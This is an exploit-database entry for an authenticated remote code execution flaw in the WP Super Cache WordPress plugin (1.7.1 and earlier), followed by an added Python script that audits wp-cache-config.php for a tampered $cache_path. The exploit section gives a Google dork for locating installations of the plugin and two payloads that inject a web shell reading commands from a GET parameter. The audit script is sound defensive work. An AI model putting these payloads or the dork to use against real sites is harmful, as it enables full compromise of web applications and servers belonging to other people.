49718_WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated) - PHP WebApps exploit.txt

Details

# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 - Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: <= 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/

### -- [ Info: ]

[i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.
[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.
[i] Another possible attack vector: from XSS to RCE.

### -- [ Impact: ]

[~] Full compromise of the vulnerable web application and also web server.

### -- [ Payloads: ]

[$] ';system($_GET[13]);include_once \'wp-cache-config.php\';'
[$] ';`$_GET[13]`;include_once \'wp-cache-config.php\';?>
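
A defender-side check for the weak $cache_path handling described above, as an added example that is not part of the original advisory or the plugin's code: it audits a copy of wp-cache-config.php and flags any $cache_path assignment that is more than one quoted path literal. It assumes the Cache Location setting is stored as a single `$cache_path = ...;` statement; the function name and the sample file contents are constructed.

```python
import re

# Assumption: the Cache Location setting is stored in wp-cache-config.php
# as one "$cache_path = ...;" statement.
ASSIGN = re.compile(r"^\s*\$cache_path\s*=\s*(.*)$")

# The only accepted value: one single-quoted path literal, optionally
# prefixed with the WP_CONTENT_DIR constant, then the closing semicolon.
SAFE_VALUE = re.compile(r"(?:WP_CONTENT_DIR\s*\.\s*)?'[A-Za-z0-9_./:\\ -]*'\s*;")


def audit_cache_path(config_text):
    """Return (line_no, line) for every $cache_path assignment that
    carries anything besides a plain quoted path."""
    findings = []
    for line_no, line in enumerate(config_text.splitlines(), 1):
        match = ASSIGN.match(line)
        if match and not SAFE_VALUE.fullmatch(match.group(1).strip()):
            findings.append((line_no, line.strip()))
    return findings


# Constructed sample file contents (not taken from a real site).
CLEAN = "<?php\n$cache_enabled = true;\n$cache_path = WP_CONTENT_DIR . '/cache/';\n"
TAMPERED = "<?php\n$cache_enabled = true;\n$cache_path = '';injected_call();'';\n"

if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("tampered", TAMPERED)):
        print(name, audit_cache_path(text))
```

Any finding means the file should be restored from a known-good copy and the plugin updated past 1.7.1.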